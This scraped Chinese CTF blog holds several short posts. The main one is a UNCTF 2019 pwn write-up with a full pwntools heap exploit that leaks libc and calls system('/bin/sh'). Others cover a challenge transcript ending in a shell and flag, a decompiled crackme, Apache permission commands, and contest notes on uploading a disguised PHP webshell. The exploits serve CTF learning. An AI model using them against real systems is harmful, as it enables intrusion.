
unctf2019 pwn部分题解

babyheap

easy,不讲了

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '127.0.0.1'
port = 10000
context.log_level = 'debug'
exe = '/tmp/tmp.spk5nTEvta/1910245db1406d3eedd'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


# don't forget to change it: local=1 spawns the binary, anything else
# connects to host:port
io = process(exe) if local else remote(host, port)


def s(data):
    """Send ``data`` (coerced to str) without a trailing newline."""
    return io.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` on the tube, then send ``data``."""
    return io.sendafter(str(delim), str(data))


def sl(data):
    """Send ``data`` followed by a newline."""
    return io.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus a newline."""
    return io.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes from the tube."""
    return io.recv(numb)


def ru(delim, drop=True):
    """Receive up to and including ``delim``; ``drop`` strips the delimiter."""
    return io.recvuntil(delim, drop)


def uu32(data):
    """Unpack ``data`` as a 32-bit integer, zero-padding it to 4 bytes first."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack ``data`` as a 64-bit integer, zero-padding it to 8 bytes first."""
    return u64(data.ljust(8, '\x00'))


def lg(name, data):
    """Log ``data`` in hex under the label ``name``."""
    return io.success(name + ": 0x%x" % data)

# break on aim addr
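def debug(addr, PIE=True):
    """Attach gdb to ``io`` with a breakpoint at ``addr``.

    addr: breakpoint address. With ``PIE=True`` it is treated as an offset
        and added to the start of the target's first memory mapping;
        otherwise it is used as an absolute address.
    PIE: whether ``addr`` is relative to the load base.
    """
    if PIE:
        # Read the first mapping's start straight from /proc: no shell,
        # no dependency on pmap being installed, and the handle is closed
        # by the with-block (the old os.popen() handle was never closed).
        with open("/proc/%d/maps" % io.pid) as maps:
            text_base = int(maps.readline().split("-")[0], 16)
        gdb.attach(io, "b *{}".format(hex(text_base + addr)))
    else:
        gdb.attach(io, "b *{}".format(hex(addr)))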


#===========================================================
# EXPLOIT GOES HERE
#===========================================================

# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)

def c(idx):
    """Answer the program's menu prompt with option ``idx``."""
    choice = str(idx)
    sla("Your choice: ", choice)

def new(content):
    """Menu option 1: create an entry and fill it with ``content``."""
    sla("Your choice: ", str(1))
    sa("Plz input content: ", content)

def edit(idx, size, content):
    """Menu option 2: overwrite entry ``idx`` with ``size`` bytes of ``content``."""
    c(2)
    for prompt, value in (("Plz input index: ", idx), ("Plz input size: ", size)):
        sla(prompt, str(value))
    sa("Plz input content: ", content)

def show(idx):
    """Menu option 3: print entry ``idx``."""
    sla("Your choice: ", str(3))
    sla("Plz input index: ", str(idx))

def free(idx):
    """Menu option 4: release entry ``idx``."""
    sla("Your choice: ", str(4))
    sla("Plz input index: ", str(idx))


def exp():
    """Drive the menu: read a pointer back from entry 0, then write entry 1."""
    # Entry 0: 0x18 bytes of filler, after which show() prints 6 more bytes
    # that are interpreted as a pointer.
    new("a" * 0x10)
    edit(0, 0x18, "a" * 0x18)
    show(0)
    r(0x18)
    leaked = uu64(r(6))
    lg("addr", leaked)
    libc.address = leaked - libc.symbols['puts']
    # Entry 1: the string padded to 0x18 bytes, followed by one 8-byte address.
    new("a" * 0x10)
    payload = "/bin/sh;#\x00".ljust(0x18, "a") + p64(libc.symbols['system'])
    edit(1, 0x20, payload)
    show(1)



#free(0)

if __name__ == "__main__":
    # Run the scripted interaction, then hand the tube to the user.
    exp()
    io.interactive()

obs_pwn

└──╼ $obs 
Attempted path: share/obs/obs-studio/locale/en-US.ini
Attempted path: /usr/share/obs/obs-studio/locale/en-US.ini
Attempted path: share/obs/obs-studio/locale.ini
Attempted path: /usr/share/obs/obs-studio/locale.ini
Attempted path: share/obs/obs-studio/themes/Dark.qss
Attempted path: /usr/share/obs/obs-studio/themes/Dark.qss
info: CPU Name: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz
info: CPU Speed: 3480.843MHz
info: Physical Cores: 2, Logical Cores: 4
info: Physical Memory: 11782MB Total, 3611MB Free
info: Kernel Version: Linux 5.2.0-2parrot1-amd64
info: Distribution: "Parrot GNU/Linux" "4.7"
info: Window System: X11.0, Vendor: The X.Org Foundation, Version: 1.20.4
info: Portable mode: false
Attempted path: share/obs/obs-studio/themes/Dark/no_sources.svg
Attempted path: /usr/share/obs/obs-studio/themes/Dark/no_sources.svg
QMetaObject::connectSlotsByName: No matching signal for on_advAudioProps_clicked()
QMetaObject::connectSlotsByName: No matching signal for on_advAudioProps_destroyed()
QMetaObject::connectSlotsByName: No matching signal for on_program_customContextMenuRequested(QPoint)
info: OBS 0.0.1 (linux)
info: ---------------------------------
info: ---------------------------------
info: audio settings reset:
samples per sec: 44100
speakers: 2
info: ---------------------------------
info: Initializing OpenGL...
info: Loading up OpenGL on adapter Intel Open Source Technology Center Mesa DRI Intel(R) HD Graphics 620 (Kaby Lake GT2)
info: OpenGL loaded successfully, version 4.5 (Core Profile) Mesa 19.1.6, shading language 4.50
info: ---------------------------------
info: video settings reset:
base resolution: 1920x1080
output resolution: 1280x720
downscale filter: Bicubic
fps: 30/1
format: NV12
YUV mode: 601/Partial
info: NV12 texture support not available
info: Audio monitoring device:
name: Default
id: default
info: ---------------------------------
warning: Failed to load 'en-US' text for module: 'decklink-ouput-ui.so'
libDeckLinkAPI.so: cannot open shared object file: No such file or directory
info: No blackmagic support
info: FFMPEG VAAPI supported
info: VLC found, VLC video source enabled
info: ---------------------------------
info: Loaded Modules:
info: vlc-video.so
info: text-freetype2.so
info: rtmp-services.so
info: obs-x264.so
info: obs-transitions.so
info: obs-outputs.so
info: obs-filters.so
info: obs-ffmpeg.so
info: linux-v4l2.so
info: linux-pulseaudio.so
info: linux-jack.so
info: linux-decklink.so
info: linux-capture.so
info: linux-alsa.so
info: image-source.so
info: frontend-tools.so
info: decklink-ouput-ui.so
info: ---------------------------------
info: ==== Startup complete ===============================================
error: Service '' not found
info: No scene file found, creating default scene
info: All scene data cleared
info: ------------------------------------------------
info: pulse-input: Server name: 'pulseaudio 13.0'
info: pulse-input: Audio format: s16le, 44100 Hz, 2 channels
info: pulse-input: Started recording from 'alsa_output.pci-0000_00_1f.3.analog-stereo.monitor'
info: pulse-input: Server name: 'pulseaudio 13.0'
info: pulse-input: Audio format: s16le, 44100 Hz, 2 channels
info: pulse-input: Started recording from 'alsa_input.pci-0000_00_1f.3.analog-stereo'
info: Switched to scene 'Scene'
warning: Failed to glob scene collections
Attempted path: share/obs/obs-studio/images/overflow.png
Attempted path: /usr/share/obs/obs-studio/images/overflow.png
info: adding 23 milliseconds of audio buffering, total audio buffering is now 23 milliseconds (source: Mic/Aux)

^Cinfo: ==== Shutting down ==================================================
info: Switched to scene '(null)'
info: pulse-input: Stopped recording from 'alsa_output.pci-0000_00_1f.3.analog-stereo.monitor'
info: pulse-input: Got 125 packets with 32338 frames
info: pulse-input: Stopped recording from 'alsa_input.pci-0000_00_1f.3.analog-stereo'
info: pulse-input: Got 271 packets with 118520 frames
info: All scene data cleared
info: ------------------------------------------------
double free or corruption (out)
Aborted

此文章已被加密,需要输入密码访问。

Printf

Welcome to the brand new Security Consultants Inc. portal!
What would you like to do?
1.) View the Team!
2.) Check the date.
3.) Sign up for our newsletter!
4.) Report a bug.
x.) Exit.
Thanks for signing up for our newsletter!
Please enter your email address below:
I have your email as:
sh;# � �aaaaaaaJ `sh: 1: Is: not found
$
Great! I have your information down as:
Name: Evan Shi
sh: 1: Email:: not found
$ cat flag.txt
tjctf{p0lygl0t_m0r3_l1k3_p0lynot}$


进制

  1. 进制的实质就是查表
  2. 熟悉2进制跟16进制的转换
  3. 熟悉进制表的制作以及计算进制之间的加减乘除

进制练习1

通过编写7进制加法表,乘法表,并计算
23456+54356 = ?
5621 - 654 = ?
234 * 65 = ?

首先编写1-100的7进制数据

0123456
10111213141516
20212223242526
30313233343536
40414243444546
50515253545556
60616263646566

apache2

apache2配置静态资源访问

需要将目录的所属用户设置为 www-data

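# Hand the directory tree to the Apache user. chown's first operand is an
# owner (optionally owner:group), not a numeric mode — "755" would be looked
# up as a user name and fail.
chown -R www-data 文件目录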

将目录文件设置为可执行

# 775 = rwxrwxr-x: owner and group may write, everyone may read/traverse.
# Serving static files only requires read + execute for the server, so 755
# is enough unless the www-data group actually needs to write here.
chmod 775 文件目录

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/8c46c3ca/
版权声明:转载请注明出处!

writeup-1-练习

简单的re

/* Decompiler output for the crackme's main(): read a string, XOR each byte
 * with a running key that starts at 34, then compare the first 0x16 bytes
 * of the result against the constant szCmp. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int v3; // edi -- running XOR key
    unsigned __int64 i; // rsi -- index of the byte being transformed
    int *v5; // rdx -- word cursor in the zero-byte scan
    int v6; // ecx
    unsigned int v7; // eax
    __int64 v8; // rdx
    __int64 v10; // [rsp+0h] [rbp-78h] -- input buffer, 0x60 bytes (see memset)
    int v11; // [rsp+60h] [rbp-18h] -- sits right after the buffer (cleared below)
    unsigned __int64 v12; // [rsp+68h] [rbp-10h] -- stack-protector canary copy

    v12 = __readfsqword(0x28u);
    _printf_chk(1LL, "input:", envp);
    memset(&v10, 0, 0x60uLL);
    v11 = 0;
    /* %s has no width limit, so input longer than 0x60 bytes overruns v10. */
    scanf("%s", &v10);
    v3 = 34;
    for ( i = 0LL; ; ++i )
    {
        /* Scan v10 a word at a time for the first zero byte
         * (0x01010101 / 0x80808080 "has-zero" trick); this looks like an
         * inlined strlen() — confirm against the disassembly. */
        v5 = (int *)&v10;
        do
        {
            v6 = *v5;
            ++v5;
            v7 = ~v6 & (v6 - 16843009) & 0x80808080;
        }
        while ( !v7 );
        if ( !(~v6 & (v6 - 16843009) & 0x8080) )
            v7 >>= 16;
        if ( !(~v6 & (v6 - 16843009) & 0x8080) )
            v5 = (int *)((char *)v5 + 2);
        /* Stop once i reaches the computed length of the input. */
        if ( i >= (char *)v5 - __CFADD__((_BYTE)v7, (_BYTE)v7) - 3 - (char *)&v10 )
            break;
        /* input[i] ^= key; the key increments by one for each byte. */
        *((_BYTE *)&v10 + i) ^= v3++;
    }
    /* Only the first 0x16 transformed bytes are compared. */
    if ( !memcmp(&szCmp, &v10, 0x16uLL) )
        _printf_chk(1LL, "right\n", v8);
    else
        _printf_chk(1LL, "wrong\n", v8);
    return 0;
}

burp无法抓取本地

解决方案：将 IP 改成它本来的 IP

比如我docker搭建的题目,我进入docker ifconfig

查看到的ip是172.17.0.6

我就访问172.17.0.6,不访问127.0.0.1就可以抓到包了

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/ea225533/
版权声明:转载请注明出处!

爬虫第一天

关于内容的思考

书里有两处遗漏

  1. 正则匹配不当

    link_craw('http://example.python-scraping.com', '/places/default/(index|view)',user_agent='BadCrawler')

    这里应该是 /places/default/ 这样的格式，因为 re.match 只匹配字符串开头，所以前面重复的路径部分也要写上

  2. 在requests这里讲解的时候代码少了个return html


比赛

1

比比手速 靶机地址:101.71.29.5:10065

burp抓包可知密码
然后文件上传,1.php.jpg
连接小马

2

https://blog.zeddyu.info/2019/02/24/%E5%AE%89%E6%81%921%E6%9C%88%E6%9C%88%E8%B5%9B/

3

https://blog.csdn.net/u011377996/article/details/83867976
